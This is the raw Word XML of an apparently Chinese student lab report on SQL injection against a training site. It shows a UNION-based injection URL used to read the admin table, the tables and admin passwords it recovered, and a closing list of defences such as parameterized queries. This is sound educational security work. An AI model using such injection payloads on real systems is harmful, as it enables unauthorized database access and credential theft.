                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>的字段有</w:t>
            </w:r>
            <w:r w:rsidR="00AD416F" w:rsidRPr="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>，content</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A514BF5" w14:textId="765C877B" w:rsidR="00AF45CC" w:rsidRPr="00AD416F" w:rsidRDefault="00E63E50" w:rsidP="00E63E50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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
              </w:rPr>
              <w:t>xss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00AD416F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>的字段有：id，user，pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C36716" w14:textId="412AB895" w:rsidR="00AD416F" w:rsidRPr="0069784F" w:rsidRDefault="00AD416F" w:rsidP="00AF45CC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="00AF45CC" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00AF45CC" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体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黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>获取</w:t>
            </w:r>
            <w:r w:rsidR="00AF45CC" w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681E4E9F" w14:textId="7597110B" w:rsidR="00B44B11" w:rsidRDefault="00AF45CC" w:rsidP="00AF45CC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0069784F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>遍历admin表中所有</w:t>
            </w:r>
            <w:r w:rsidR="00B44B11">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>字段：</w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r w:rsidR="00B44B11" w:rsidRPr="006328C8">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                  <w:b/>
                  <w:bCs/>
                  <w:i/>
                  <w:iCs/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1+and+1=2+union+SELECT+1,username+from+admin+limit+0,+1#</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3577B74B" w14:textId="41200902" w:rsidR="00AF45CC" w:rsidRDefault="00B44B11" w:rsidP="00AF45CC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F690599" wp14:editId="6B089246">
                  <wp:extent cx="4871085" cy="3012440"/>
                  <wp:effectExtent l="0" t="0" r="571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6704A" w14:textId="39044D75" w:rsidR="00B44B11" w:rsidRDefault="00B44B11" w:rsidP="00AF45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之后仅需改变limit偏移量和查询字段即可，后面不再截图</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="751C4FE0" w14:textId="2A02876A" w:rsidR="00B44B11" w:rsidRDefault="00B44B11" w:rsidP="00AF45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得到用户名为：admin和</w:t>
            </w:r>
            <w:r w:rsidRPr="00B44B11">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ppt领取微信</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DD0C533" w14:textId="2835F1C8" w:rsidR="00AF45CC" w:rsidRPr="00B44B11" w:rsidRDefault="00B44B11" w:rsidP="00B44B1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对应的密码为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hellohack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和</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B44B11">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
              </w:rPr>
              <w:t>zkaqbanban</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="0D8F7C36" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="1907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57EEE26" w14:textId="7796F7EB" w:rsidR="0053629E" w:rsidRDefault="00111201" w:rsidP="0053629E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lastRenderedPageBreak/>
              <w:t>实验过程中遇到的问题及解决情况</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E8A85B" w14:textId="5AAE04C7" w:rsidR="00CC4783" w:rsidRDefault="00AF45CC" w:rsidP="00AF45CC">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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无</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00122B8B" w14:paraId="7E71D8CA" w14:textId="77777777" w:rsidTr="00E96A77">
        <w:trPr>
          <w:trHeight w:val="5530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ACC4635" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00111201" w:rsidP="0053629E">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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六、实验结果及分析和（或）源程序调试过程</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05853A43" w14:textId="77777777" w:rsidR="00AF45CC" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="0053629E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实验结果：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CCFD726" w14:textId="2FDBBA15" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788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1. 数据库名：</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>maoshe</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="29856D31" w14:textId="77777777" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788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</w:t>
            </w:r>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w: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数据库的所有表及其字段：</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="3-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5489"/>
            </w:tblGrid>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="28C48587" w14:textId="77777777" w:rsidTr="00F523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167" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4E2A9568" w14:textId="3FDC4985" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="114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表名</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5489" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="52B299D6" w14:textId="00FD5600" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="11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字段</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="76F3D3E4" w14:textId="77777777" w:rsidTr="00F52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7" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="16435D45" w14:textId="562B74C5" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="114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admin</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5489" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="315DCFA6" w14:textId="7AF1CFDA" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="00A356BA" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="11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I</w:t>
                  </w:r>
                  <w:r w:rsidR="008D0788"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d, username, password</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="144210DE" w14:textId="77777777" w:rsidTr="00F523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7" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="0314C1B3" w14:textId="1DF3B2BA" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="114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proofErr w:type="spellStart"/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d</w:t>
                  </w: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irs</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5489" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4E57AAD8" w14:textId="144FCCD6" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="11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p</w:t>
                  </w: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ath</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="694D209B" w14:textId="77777777" w:rsidTr="00F52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7" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="458DCA72" w14:textId="7F9ECA15" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="114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news</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5489" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="6B9C6149" w14:textId="55CDD7C6" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="00A356BA" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="11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i</w:t>
                  </w:r>
                  <w:r w:rsidR="008D0788"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d, content</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="6AE3CA7F" w14:textId="77777777" w:rsidTr="00F523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7" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2D363EEB" w14:textId="422EE162" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="114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proofErr w:type="spellStart"/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x</w:t>
                  </w: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ss</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="5489" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="1518939E" w14:textId="063EA176" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="00A356BA" w:rsidP="00F523DD">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs>
                    <w:ind w:left="1140" w:hanging="11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i</w:t>
                  </w:r>
                  <w:r w:rsidR="008D0788"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d, user, pass</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="5C0DAC95" w14:textId="13A2A660" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w: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所有用户及其密码：</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="3-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3828"/>
            </w:tblGrid>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="13E9B9EE" w14:textId="77777777" w:rsidTr="00F523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828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="2B784C31" w14:textId="08D3FBAD" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs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u</w:t>
                  </w:r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sername</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="410FBD9B" w14:textId="2EDDB535" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="114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password</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="7604249F" w14:textId="77777777" w:rsidTr="00F52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8" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="088E920B" w14:textId="011C4954" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs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a</w:t>
                  </w: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dmin</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="60855469" w14:textId="30B5FF8A" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="114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proofErr w:type="spellStart"/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h</w:t>
                  </w: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ellohack</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="008D0788" w:rsidRPr="00A30581" w14:paraId="67971A50" w14:textId="77777777" w:rsidTr="00F523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8" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="17FDD7DB" w14:textId="3F3D50AF" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1140"/>
                    </w:tabs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ppt</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r w:rsidRPr="00A30581">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体" w:hint="eastAsia"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>领取微信</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="3828" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="004EBC36" w14:textId="6C0312E7" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788">
                  <w:pPr>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="114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</w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00A30581">
                    <w:rPr>
                      <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                      <w:sz w:val="24"/>
                      <w:szCs w:val="24"/>
                    </w:rPr>
                    <w:t>zkaqbanban</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="570C9BAB" w14:textId="77777777" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788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  <w:p w14:paraId="13AF35B2" w14:textId="77777777" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788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实验总结：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AA57622" w14:textId="77777777" w:rsidR="008D0788" w:rsidRPr="00A30581" w:rsidRDefault="008D0788" w:rsidP="008D0788">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:ind w:firstLineChars="200" w:firstLine="480"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:bCs/>
                <w:color w:val="FF0000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hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>任何SQL是操作数据库数据的结构化查询语言，网页的应用数据和后台数据库中的数据进行</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>交互时</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数，修改拼接成SQL语句，传递给Web服务器，进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库，就可能导致拼接的SQL被执行，获取对数据库的信息以及提权，发生SQL注入攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F947B3A" w14:textId="5D661A07" w:rsidR="00AC7FE7" w:rsidRPr="00A30581" w:rsidRDefault="00AC7FE7" w:rsidP="00AC7FE7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防范SQL注入攻击的几个方法：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="376908C9" w14:textId="162081A1" w:rsidR="00AC7FE7" w:rsidRPr="00A30581" w:rsidRDefault="00AC7FE7" w:rsidP="00AC7FE7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1</w:t>
            </w:r>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w: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使用参数化查询：使用参数化查询可以避免拼接用户输入的SQL语句，从而有效地防止SQL注入攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5382CB6E" w14:textId="561F9EEB" w:rsidR="00AC7FE7" w:rsidRPr="00A30581" w:rsidRDefault="00AC7FE7" w:rsidP="00AC7FE7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</w:t>
            </w:r>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w: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过滤用户输入：对用户输入的数据进行过滤和校验，例如限制输入长</w:t>
            </w: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lastRenderedPageBreak/>
              <w:t>度、类型、格式等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDF1006" w14:textId="77777777" w:rsidR="00AC7FE7" w:rsidRPr="00A30581" w:rsidRDefault="00AC7FE7" w:rsidP="00AC7FE7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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w: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最小权限原则：将数据库的访问权限控制在最小范围内，只给予应用程序所需的最低权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3875CAC6" w14:textId="0E96F950" w:rsidR="00AC7FE7" w:rsidRPr="00A30581" w:rsidRDefault="00AC7FE7" w:rsidP="00AC7FE7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4</w:t>
            </w:r>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w: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错误信息处理：不要将详细的错误信息返回给用户，因为这些信息可能会被攻击者用于进一步攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B6B118E" w14:textId="02738F0D" w:rsidR="00AC7FE7" w:rsidRPr="00A30581" w:rsidRDefault="00AC7FE7" w:rsidP="00AC7FE7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs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5</w:t>
            </w:r>
            <w:r w:rsidRPr="00A30581">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w: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使用ORM或其他框架：ORM（对象关系映射）和其他框架通常会提供对SQL注入攻击的防御机制，使用这些框架可以有效地降低SQL注入攻击的风险。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47B4CEE4" w14:textId="655FB359" w:rsidR="008D0788" w:rsidRPr="00AC7FE7" w:rsidRDefault="00AC7FE7" w:rsidP="00AC7FE7">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A3058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预防 SQL 注入攻击需要开发人员有足够的安全意识，并采取相应的措施来保证应用程序的安全性。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="635E24F1" w14:textId="77777777" w:rsidR="00122B8B" w:rsidRDefault="00122B8B">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00122B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BCCC" w14:textId="77777777" w:rsidR="00542D7A" w:rsidRDefault="00542D7A">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="71D278D0" w14:textId="77777777" w:rsidR="00542D7A" w:rsidRDefault="0054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C022" w14:textId="77777777" w:rsidR="00542D7A" w:rsidRDefault="00542D7A">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="23269DC0" w14:textId="77777777" w:rsidR="00542D7A" w:rsidRDefault="00542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3B963A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F73B963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FAF0AE0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A8C40682"/>
    <w:lvl w:ilvl="0" w:tplc="1EDE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6C3B25"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3964F8AC"/>
    <w:lvl w:ilvl="0" w:tplc="DAE4F3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B8E5AE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="83C0D15C"/>
    <w:lvl w:ilvl="0" w:tplc="D408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M4MmRmOGY3ZTgzNWQ1MzIzMjg1YmI1MzY3NTRkZDkifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00D31D50"/>
    <w:rsid w:val="000464C0"/>
    <w:rsid w:val="00081BD4"/>
    <w:rsid w:val="000C72AC"/>
    <w:rsid w:val="000C7ABC"/>
    <w:rsid w:val="000D1DA0"/>
    <w:rsid w:val="000E07CF"/>
    <w:rsid w:val="00106BAC"/>
    <w:rsid w:val="00111201"/>
    <w:rsid w:val="00122B8B"/>
    <w:rsid w:val="00125B21"/>
    <w:rsid w:val="00176A93"/>
    <w:rsid w:val="001B0DA1"/>
    <w:rsid w:val="001D75F1"/>
    <w:rsid w:val="001E37F8"/>
    <w:rsid w:val="001F5C55"/>
    <w:rsid w:val="00227DCD"/>
    <w:rsid w:val="0026483D"/>
    <w:rsid w:val="0028261B"/>
    <w:rsid w:val="0029005F"/>
    <w:rsid w:val="002D37B1"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="003766B5"/>
    <w:rsid w:val="003D1456"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="003F4DEC"/>
    <w:rsid w:val="003F5324"/>
    <w:rsid w:val="004028C4"/>
    <w:rsid w:val="00420C36"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="00427A62"/>
    <w:rsid w:val="00427AC4"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="00443E3E"/>
